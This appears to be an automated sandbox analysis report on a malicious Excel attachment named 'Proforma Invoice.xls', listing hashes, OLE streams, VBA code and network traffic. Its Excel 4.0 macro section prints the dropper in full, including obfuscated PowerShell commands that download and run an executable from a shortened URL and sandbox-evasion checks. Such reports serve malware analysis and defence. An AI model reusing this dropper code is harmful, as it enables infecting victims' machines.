                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Dexter MORGAN, Last Saved By: Administrator, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Oct 25 18:24:14 2020, Last Saved Time/Date: Sat Nov 14 12:53:19 2020, Security: 1
                                                  Entropy (8bit):6.722113426938609
                                                  TrID:
                                                  • Microsoft Excel sheet (30009/1) 47.99%
                                                  • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                  • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                  File name:Proforma Invoice.xls
                                                  File size:76288
                                                  MD5:55db711144ff4a35faf58d982e7cf727
                                                  SHA1:ea7b59dde9f0600915069dec66f8410f25cb66fd
                                                  SHA256:6e76bd502c91158631cadf485ce44caa4d6504864735593fc23d90477a794d17
                                                  SHA512:92e99e23ef71f4b1b9e3f6733ca16d51a2e44a777581c6a4a9b35b4c3574620cbff37ba02052bd7932f75acd2b70a2750f4c53c0d87db75e8a10c4aa1cf4192a
                                                  SSDEEP:1536:/pqnSGiysRchNXHfA1MiWhZFGkElMFAAr7IQmSb4wIE7zp0RhBv1hQz7rTb16mL:/4nSGiysRchNXHfA1MiWhZFGkElMFAAv
                                                  File Content Preview:........................;...................................z..................................................................................................................................................................................................

                                                  File Icon

                                                  Icon Hash:e4eea286a4b4bcb4

                                                  Static OLE Info

                                                  General

                                                  Document Type:OLE
                                                  Number of OLE Files:1

                                                  OLE File "Proforma Invoice.xls"

                                                  Indicators

                                                  Has Summary Info:True
                                                  Application Name:Microsoft Excel
                                                  Encrypted Document:False
                                                  Contains Word Document Stream:False
                                                  Contains Workbook/Book Stream:True
                                                  Contains PowerPoint Document Stream:False
                                                  Contains Visio Document Stream:False
                                                  Contains ObjectPool Stream:
                                                  Flash Objects Count:
                                                  Contains VBA Macros:True

                                                  Summary

                                                  Code Page:1252
                                                  Author:Dexter MORGAN
                                                  Last Saved By:Administrator
                                                  Create Time:2020-10-25 18:24:14
                                                  Last Saved Time:2020-11-14 12:53:19
                                                  Creating Application:Microsoft Excel
                                                  Security:1

                                                  Document Summary

                                                  Document Code Page:1252
                                                  Thumbnail Scaling Desired:False
                                                  Company:
                                                  Contains Dirty Links:False
                                                  Shared Document:False
                                                  Changed Hyperlinks:False
                                                  Application Version:983040

                                                  Streams with VBA

                                                  VBA File Name: Feuil1.cls, Stream Size: 977
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Feuil1
                                                  VBA File Name:Feuil1.cls
                                                  Stream Size:977
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P , S . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 50 2c 53 9f 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                  VBA Code Keywords

                                                  Keyword
                                                  VB_Exposed
                                                  Attribute
                                                  VB_Name
                                                  VB_Creatable
                                                  VB_PredeclaredId
                                                  VB_GlobalNameSpace
                                                  VB_Base
                                                  VB_Customizable
                                                  False
                                                  VB_TemplateDerived
                                                  VBA Code
                                                  Attribute VB_Name = "Feuil1"
                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                  Attribute VB_GlobalNameSpace = False
                                                  Attribute VB_Creatable = False
                                                  Attribute VB_PredeclaredId = True
                                                  Attribute VB_Exposed = True
                                                  Attribute VB_TemplateDerived = False
                                                  Attribute VB_Customizable = True
                                                  VBA File Name: Module1.bas, Stream Size: 1512
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Module1
                                                  VBA File Name:Module1.bas
                                                  Stream Size:1512
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . . . . . . . . . . . P , : u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                  Data Raw:01 16 01 00 03 f0 00 00 00 dc 02 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 0a 03 00 00 42 05 00 00 00 00 00 00 01 00 00 00 50 2c 3a 75 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 04 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                  VBA Code Keywords

                                                  Keyword
                                                  (strMacro)
                                                  strMacro
                                                  Attribute
                                                  auto_open()
                                                  VB_Name
                                                  String
                                                  VBA Code
                                                  Attribute VB_Name = "Module1"
                                                  Sub auto_open()
                                                  
                                                  
                                                  Dim strMacro As String
                                                  
                                                  
                                                  
                                                  
                                                  Sheets(1).Range("E580").Name = "Auto_ouvrir51"
                                                  
                                                  
                                                  strMacro = "Auto_ouvrir51"
                                                  Run (strMacro)
                                                  
                                                  
                                                  
                                                  End Sub
                                                  VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                  VBA File Name:ThisWorkbook.cls
                                                  Stream Size:985
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P , . + . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 50 2c c8 2b 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                  VBA Code Keywords

                                                  Keyword
                                                  False
                                                  VB_Exposed
                                                  Attribute
                                                  VB_Name
                                                  VB_Creatable
                                                  "ThisWorkbook"
                                                  VB_PredeclaredId
                                                  VB_GlobalNameSpace
                                                  VB_Base
                                                  VB_Customizable
                                                  VB_TemplateDerived
                                                  VBA Code
                                                  Attribute VB_Name = "ThisWorkbook"
                                                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                  Attribute VB_GlobalNameSpace = False
                                                  Attribute VB_Creatable = False
                                                  Attribute VB_PredeclaredId = True
                                                  Attribute VB_Exposed = True
                                                  Attribute VB_TemplateDerived = False
                                                  Attribute VB_Customizable = True

                                                  Streams

                                                  Stream Path: \x1CompObj, File Type: data, Stream Size: 115
                                                  General
                                                  Stream Path:\x1CompObj
                                                  File Type:data
                                                  Stream Size:115
                                                  Entropy:4.26356656053
                                                  Base64 Encoded:True
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F ' . . . F e u i l l e d e c a l c u l M i c r o s o f t E x c e l . 2 0 0 3 . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 27 00 00 00 46 65 75 69 6c 6c 65 20 64 65 20 63 61 6c 63 75 6c 20 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c a0 32 30 30 33 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 296
                                                  General
                                                  Stream Path:\x5DocumentSummaryInformation
                                                  File Type:data
                                                  Stream Size:296
                                                  Entropy:3.12351939639
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . . . F e u i l l e s d e c a l c u l . .
                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f8 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 ac 00 00 00
                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 224
                                                  General
                                                  Stream Path:\x5SummaryInformation
                                                  File Type:data
                                                  Stream Size:224
                                                  Entropy:3.82752718687
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D e x t e r M O R G A N . . . . . . . . . . . A d m i n i s t r a t o r . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . . . . @ . . . . . W . . . . . . . . . . . .
                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 b0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 60 00 00 00 12 00 00 00 78 00 00 00 0c 00 00 00 90 00 00 00 0d 00 00 00 9c 00 00 00 13 00 00 00 a8 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 0e 00 00 00
                                                  Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 61163
                                                  General
                                                  Stream Path:Workbook
                                                  File Type:Applesoft BASIC program data, first line number 16
                                                  Stream Size:61163
                                                  Entropy:7.20561555755
                                                  Base64 Encoded:True
                                                  Data ASCII:. . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . U s e r n i s t r a t o r B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . B T . . 8 . . . . . . . X
                                                  Data Raw:09 08 10 00 00 06 05 00 54 38 cd 07 c9 00 02 00 06 07 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 55 73 65 72 6e 69 73 74 72 61 74 6f 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                  Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 533
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Stream Size:533
                                                  Entropy:5.2193098334
                                                  Base64 Encoded:True
                                                  Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = F e u i l 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D E D C 7 2 1 D 9 2 2 7 2 3 2 B 2 3 2 B 2 7 2 F 2 7 2 F " . . D P B = " 7 3 7 1 D F 8 8
                                                  Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 46 65 75 69 6c 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 48 65 6c 70 46
                                                  Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 86
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                  File Type:data
                                                  Stream Size:86
                                                  Entropy:3.21559847503
                                                  Base64 Encoded:False
                                                  Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . F e u i l 1 . F . e . u . i . l . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
                                                  Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 46 65 75 69 6c 31 00 46 00 65 00 75 00 69 00 6c 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00
                                                  Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2607
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                  File Type:data
                                                  Stream Size:2607
                                                  Entropy:4.00233365281
                                                  Base64 Encoded:False
                                                  Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . .
                                                  Data Raw:cc 61 a3 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 2c 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                  Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1136
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                                                  File Type:data
                                                  Stream Size:1136
                                                  Entropy:4.08521227715
                                                  Base64 Encoded:False
                                                  Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ o . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . 2 . . . K . ` . A e ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                  Data Raw:93 4b 2a a3 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 02 00 00 7e 6f 00 00 7f 00 00 00 00 15 00 00 00
                                                  Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 74
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                                                  File Type:data
                                                  Stream Size:74
                                                  Entropy:1.7969826379
                                                  Base64 Encoded:False
                                                  Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . .
                                                  Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff 09 00 00 00 00 00 03 00 74 00 00 7f 00 00 00 00
                                                  Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 84
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                                                  File Type:data
                                                  Stream Size:84
                                                  Entropy:1.91120509258
                                                  Base64 Encoded:False
                                                  Data ASCII:r U . . . . . . . . . . . . . . . . . . . ~ | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . k . . . . . . .
                                                  Data Raw:72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 02 00 00 7e 7c 00 00 7f 00 00 00 00 0e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 08 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff 04 00 00 12 00 00 6b 00 00 7f 00 00 00 00
                                                  Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 103
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
                                                  File Type:data
                                                  Stream Size:103
                                                  Entropy:1.89141813866
                                                  Base64 Encoded:False
                                                  Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . n . . . . . . .
                                                  Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 08 00 00 00 04 00 24 00 81 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6e 00 00 7f 00 00 00 00
                                                  Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 568
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                  File Type:data
                                                  Stream Size:568
                                                  Entropy:6.35089764744
                                                  Base64 Encoded:True
                                                  Data ASCII:. 4 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                  Data Raw:01 34 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 e8 8b 95 61 06 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                  Macro 4.0 Code

                                                  "=ERROR(FALSE; (B100))""=IF(GET.WORKSPACE(19);;CLOSE(TRUE))""=IF(GET.WORKSPACE(42);;CLOSE(TRUE))""=EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&""wer^she""&CHAR(108)&CHAR(108)&CHAR(32)&"" -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').""""Invoke""""('""&CHAR(104)&""ttps://cutt.ly/ZhqUH1O','vx.exe')"")""=EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&""wer^she""&CHAR(108)&CHAR(108)&CHAR(32)&"" -w 1 stARt`-slE`Ep 20; Move-Item """"vx.exe"""" -Destination """"${enV`:appdata}"""""")""=EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&""wer^she""&CHAR(108)&CHAR(108)&CHAR(32)&"" -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe"")"=PAUSE()

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 19, 2020 10:13:22.580190897 CET49167443192.168.2.22104.22.1.232
                                                  Nov 19, 2020 10:13:22.602308989 CET44349167104.22.1.232192.168.2.22
                                                  Nov 19, 2020 10:13:22.602430105 CET49167443192.168.2.22104.22.1.232
                                                  Nov 19, 2020 10:13:22.613116980 CET49167443192.168.2.22104.22.1.232
                                                  Nov 19, 2020 10:13:22.635268927 CET44349167104.22.1.232192.168.2.22
                                                  Nov 19, 2020 10:13:22.638175964 CET44349167104.22.1.232192.168.2.22
                                                  Nov 19, 2020 10:13:22.638245106 CET44349167104.22.1.232192.168.2.22
                                                  Nov 19, 2020 10:13:22.638271093 CET44349167104.22.1.232192.168.2.22
                                                  Nov 19, 2020 10:13:22.638298035 CET49167443192.168.2.22104.22.1.232
                                                  Nov 19, 2020 10:13:22.652420998 CET49167443192.168.2.22104.22.1.232
                                                  Nov 19, 2020 10:13:22.674890041 CET44349167104.22.1.232192.168.2.22
                                                  Nov 19, 2020 10:13:22.674922943 CET44349167104.22.1.232192.168.2.22
                                                  Nov 19, 2020 10:13:22.885773897 CET49167443192.168.2.22104.22.1.232
                                                  Nov 19, 2020 10:13:22.905165911 CET44349167104.22.1.232192.168.2.22
                                                  Nov 19, 2020 10:13:22.905392885 CET49167443192.168.2.22104.22.1.232
                                                  Nov 19, 2020 10:13:23.971853971 CET49167443192.168.2.22104.22.1.232
                                                  Nov 19, 2020 10:13:23.994452000 CET44349167104.22.1.232192.168.2.22
                                                  Nov 19, 2020 10:13:24.110934973 CET44349167104.22.1.232192.168.2.22
                                                  Nov 19, 2020 10:13:24.110964060 CET44349167104.22.1.232192.168.2.22
                                                  Nov 19, 2020 10:13:24.111212969 CET49167443192.168.2.22104.22.1.232
                                                  Nov 19, 2020 10:13:24.452984095 CET49169443192.168.2.22202.92.6.10
                                                  Nov 19, 2020 10:13:24.777394056 CET44349169202.92.6.10192.168.2.22
                                                  Nov 19, 2020 10:13:24.777488947 CET49169443192.168.2.22202.92.6.10
                                                  Nov 19, 2020 10:13:24.778153896 CET49169443192.168.2.22202.92.6.10
                                                  Nov 19, 2020 10:13:25.102404118 CET44349169202.92.6.10192.168.2.22
                                                  Nov 19, 2020 10:13:25.102571964 CET44349169202.92.6.10192.168.2.22
                                                  Nov 19, 2020 10:13:25.102615118 CET44349169202.92.6.10192.168.2.22
                                                  Nov 19, 2020 10:13:25.102631092 CET44349169202.92.6.10192.168.2.22
                                                  Nov 19, 2020 10:13:25.102694988 CET49169443192.168.2.22202.92.6.10
                                                  Nov 19, 2020 10:13:25.103091955 CET49169443192.168.2.22202.92.6.10
                                                  Nov 19, 2020 10:13:25.118791103 CET49170443192.168.2.22202.92.6.10
                                                  Nov 19, 2020 10:13:25.119843006 CET49169443192.168.2.22202.92.6.10
                                                  Nov 19, 2020 10:13:25.432653904 CET44349170202.92.6.10192.168.2.22
                                                  Nov 19, 2020 10:13:25.432785034 CET49170443192.168.2.22202.92.6.10
                                                  Nov 19, 2020 10:13:25.433320045 CET49170443192.168.2.22202.92.6.10
                                                  Nov 19, 2020 10:13:25.444309950 CET44349169202.92.6.10192.168.2.22
                                                  Nov 19, 2020 10:13:25.746805906 CET44349170202.92.6.10192.168.2.22
                                                  Nov 19, 2020 10:13:25.746820927 CET44349170202.92.6.10192.168.2.22
                                                  Nov 19, 2020 10:13:25.746830940 CET44349170202.92.6.10192.168.2.22
                                                  Nov 19, 2020 10:13:25.746843100 CET44349170202.92.6.10192.168.2.22
                                                  Nov 19, 2020 10:13:25.746854067 CET44349170202.92.6.10192.168.2.22
                                                  Nov 19, 2020 10:13:25.746864080 CET44349170202.92.6.10192.168.2.22
                                                  Nov 19, 2020 10:13:25.746876955 CET44349170202.92.6.10192.168.2.22
                                                  Nov 19, 2020 10:13:25.746886969 CET44349170202.92.6.10192.168.2.22
                                                  Nov 19, 2020 10:13:25.746953011 CET49170443192.168.2.22202.92.6.10
                                                  Nov 19, 2020 10:13:25.746982098 CET49170443192.168.2.22202.92.6.10
                                                  Nov 19, 2020 10:13:25.746984959 CET49170443192.168.2.22202.92.6.10
                                                  Nov 19, 2020 10:13:25.746988058 CET49170443192.168.2.22202.92.6.10
                                                  Nov 19, 2020 10:13:25.750351906 CET49170443192.168.2.22202.92.6.10
                                                  Nov 19, 2020 10:13:26.063963890 CET44349170202.92.6.10192.168.2.22
                                                  Nov 19, 2020 10:13:26.063986063 CET44349170202.92.6.10192.168.2.22
                                                  Nov 19, 2020 10:13:26.064173937 CET49170443192.168.2.22202.92.6.10
                                                  Nov 19, 2020 10:13:26.117590904 CET49167443192.168.2.22104.22.1.232

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 19, 2020 10:13:22.554903030 CET5219753192.168.2.228.8.8.8
                                                  Nov 19, 2020 10:13:22.567907095 CET53521978.8.8.8192.168.2.22
                                                  Nov 19, 2020 10:13:23.109313011 CET5309953192.168.2.228.8.8.8
                                                  Nov 19, 2020 10:13:23.122746944 CET53530998.8.8.8192.168.2.22
                                                  Nov 19, 2020 10:13:23.125921011 CET5283853192.168.2.228.8.8.8
                                                  Nov 19, 2020 10:13:23.138626099 CET53528388.8.8.8192.168.2.22
                                                  Nov 19, 2020 10:13:24.118302107 CET6120053192.168.2.228.8.8.8
                                                  Nov 19, 2020 10:13:24.451885939 CET53612008.8.8.8192.168.2.22

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Nov 19, 2020 10:13:22.554903030 CET192.168.2.228.8.8.80x51f2Standard query (0)cutt.lyA (IP address)IN (0x0001)
                                                  Nov 19, 2020 10:13:24.118302107 CET192.168.2.228.8.8.80x541fStandard query (0)shopphongtinh.comA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
